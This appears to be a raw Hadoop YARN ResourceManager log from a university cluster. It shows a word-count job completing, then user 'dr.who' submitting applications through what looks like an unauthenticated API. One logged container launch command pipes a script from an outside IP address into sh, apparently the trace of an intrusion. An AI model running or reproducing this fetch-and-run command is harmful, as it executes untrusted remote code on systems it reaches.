2019-09-23 17:12:53,978 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000017 in state: RELEASED event:RELEASED
2019-09-23 17:12:53,979 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000017
2019-09-23 17:12:53,979 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000017 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available, release resources=true
2019-09-23 17:12:53,979 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000017 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=10 available=<memory:54272, vCores:22> used=<memory:11264, vCores:10> with event: RELEASED
2019-09-23 17:12:53,981 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000018 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:54,407 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000018 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:54,985 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569279589137_0003
2019-09-23 17:12:56,994 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569279589137_0003
2019-09-23 17:12:57,629 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000018 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:57,629 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000018 in state: COMPLETED event:FINISHED
2019-09-23 17:12:57,629 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000018
2019-09-23 17:12:57,629 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000018 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 17:12:57,629 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000018 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 17:12:57,753 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000010 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:57,753 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000010 in state: COMPLETED event:FINISHED
2019-09-23 17:12:57,753 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000010
2019-09-23 17:12:57,753 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 17:12:57,753 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000010 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: FINISHED
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000014 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000014 in state: COMPLETED event:FINISHED
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000014
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000014 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000014 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000013 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000013 in state: COMPLETED event:FINISHED
2019-09-23 17:12:57,800 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000013
2019-09-23 17:12:57,801 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000013 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 17:12:57,801 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000013 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 17:12:57,801 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000009 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:57,801 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000009 in state: COMPLETED event:FINISHED
2019-09-23 17:12:57,801 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000009
2019-09-23 17:12:57,802 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:12:57,802 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000009 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 17:12:57,840 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000015 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:57,840 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000015 in state: COMPLETED event:FINISHED
2019-09-23 17:12:57,840 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000015
2019-09-23 17:12:57,840 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000015 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
2019-09-23 17:12:57,840 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000015 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 17:12:58,114 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000016 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:58,114 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000016 in state: COMPLETED event:FINISHED
2019-09-23 17:12:58,114 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000016
2019-09-23 17:12:58,114 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000016 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available, release resources=true
2019-09-23 17:12:58,114 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000016 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=3 available=<memory:61440, vCores:29> used=<memory:4096, vCores:3> with event: FINISHED
2019-09-23 17:12:58,689 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000012 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:58,689 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000012 in state: COMPLETED event:FINISHED
2019-09-23 17:12:58,689 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000012
2019-09-23 17:12:58,689 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000012 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available, release resources=true
2019-09-23 17:12:58,689 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000012 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=2 available=<memory:62464, vCores:30> used=<memory:3072, vCores:2> with event: FINISHED
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0003_000001 with final state: FINISHING, and exit status: -1000
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from RUNNING to FINAL_SAVING
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569279589137_0003 with final state: FINISHING
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from RUNNING to FINAL_SAVING
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569279589137_0003
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from FINAL_SAVING to FINISHING
2019-09-23 17:12:58,892 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from FINAL_SAVING to FINISHING
2019-09-23 17:12:59,691 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000011 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:59,691 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000011 in state: COMPLETED event:FINISHED
2019-09-23 17:12:59,691 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000011
2019-09-23 17:12:59,691 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available, release resources=true
2019-09-23 17:12:59,691 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000011 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=1 available=<memory:63488, vCores:31> used=<memory:2048, vCores:1> with event: FINISHED
2019-09-23 17:12:59,895 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: application_1569279589137_0003 unregistered successfully. 
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000001 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000001 in state: COMPLETED event:FINISHED
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0003_000001
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000001
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0003_000001
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0003_000001 State change from FINISHING to FINISHED
2019-09-23 17:13:05,712 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: FINISHED
2019-09-23 17:13:05,713 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0003 State change from FINISHING to FINISHED
2019-09-23 17:13:05,713 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0003_000001 is done. finalState=FINISHED
2019-09-23 17:13:05,713 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=Application Finished - Succeeded	TARGET=RMAppManager	RESULT=SUCCESS	APPID=application_1569279589137_0003
2019-09-23 17:13:05,713 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0003 requests cleared
2019-09-23 17:13:05,713 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569279589137_0003_000001
2019-09-23 17:13:05,713 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569279589137_0003,name=word count,user=F19_TIP,queue=root.F19_TIP,state=FINISHED,trackingUrl=http://master_hostname:8088/proxy/application_1569279589137_0003/,appMasterHost=cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us,startTime=1569280357036,finishTime=1569280378892,finalStatus=SUCCEEDED,memorySeconds=159760,vcoreSeconds=118,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=MAPREDUCE
2019-09-23 17:13:06,730 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 17:13:06,731 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 17:13:06,732 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 17:48:33,394 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 4
2019-09-23 17:48:33,717 WARN org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: The specific max attempts: 0 for application: 4 is invalid, because it is out of the range [1, 2]. Use the global max attempts instead.
2019-09-23 17:48:33,718 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 4 submitted by user dr.who
2019-09-23 17:48:33,718 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569279589137_0004
2019-09-23 17:48:33,718 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569279589137_0004
2019-09-23 17:48:33,718 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0004 State change from NEW to NEW_SAVING
2019-09-23 17:48:33,718 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569279589137_0004
2019-09-23 17:48:33,718 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0004 State change from NEW_SAVING to SUBMITTED
2019-09-23 17:48:33,718 WARN org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.QueuePlacementRule: Name dr.who is converted to dr_dot_who when it is used as a queue name.
2019-09-23 17:48:33,726 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569279589137_0004 from user: dr.who, in queue: default, currently num of applications: 1
2019-09-23 17:48:33,727 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0004 State change from SUBMITTED to ACCEPTED
2019-09-23 17:48:33,727 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0004_000001
2019-09-23 17:48:33,727 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from NEW to SUBMITTED
2019-09-23 17:48:33,727 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0004_000001 to scheduler from user: dr.who
2019-09-23 17:48:33,730 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 17:48:34,018 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:48:34,018 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0004	CONTAINERID=container_1569279589137_0004_01_000001
2019-09-23 17:48:34,018 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0004_01_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 1 containers, <memory:1024, vCores:1> used and <memory:64512, vCores:31> available after allocation
2019-09-23 17:48:34,019 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0004_01_000001
2019-09-23 17:48:34,020 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:48:34,020 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0004_000001
2019-09-23 17:48:34,020 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0004 AttemptId: appattempt_1569279589137_0004_000001 MasterContainer: Container: [ContainerId: container_1569279589137_0004_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:48:34,021 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:48:34,021 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:48:34,022 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0004_000001
2019-09-23 17:48:34,025 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0004_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0004_000001
2019-09-23 17:48:34,025 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0004_01_000001 : curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
2019-09-23 17:48:34,026 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0004_000001
2019-09-23 17:48:34,026 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0004_000001
2019-09-23 17:48:34,043 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0004_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0004_000001
2019-09-23 17:48:34,043 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 17:48:35,019 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_01_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:49:05,250 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 5
2019-09-23 17:49:05,398 WARN org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: The specific max attempts: 0 for application: 5 is invalid, because it is out of the range [1, 2]. Use the global max attempts instead.
2019-09-23 17:49:05,399 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 5 submitted by user dr.who
2019-09-23 17:49:05,399 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569279589137_0005
2019-09-23 17:49:05,399 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569279589137_0005
2019-09-23 17:49:05,399 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0005 State change from NEW to NEW_SAVING
2019-09-23 17:49:05,399 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569279589137_0005
2019-09-23 17:49:05,399 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0005 State change from NEW_SAVING to SUBMITTED
2019-09-23 17:49:05,399 WARN org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.QueuePlacementRule: Name dr.who is converted to dr_dot_who when it is used as a queue name.
2019-09-23 17:49:05,400 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569279589137_0005 from user: dr.who, in queue: default, currently num of applications: 2
2019-09-23 17:49:05,401 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0005 State change from SUBMITTED to ACCEPTED
2019-09-23 17:49:05,401 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0005_000001
2019-09-23 17:49:05,401 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from NEW to SUBMITTED
2019-09-23 17:49:05,401 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0005_000001 to scheduler from user: dr.who
2019-09-23 17:49:05,402 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 17:49:06,070 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0005_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:49:06,070 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0005	CONTAINERID=container_1569279589137_0005_01_000001
2019-09-23 17:49:06,070 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0005_01_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 2 containers, <memory:2048, vCores:2> used and <memory:63488, vCores:30> available after allocation
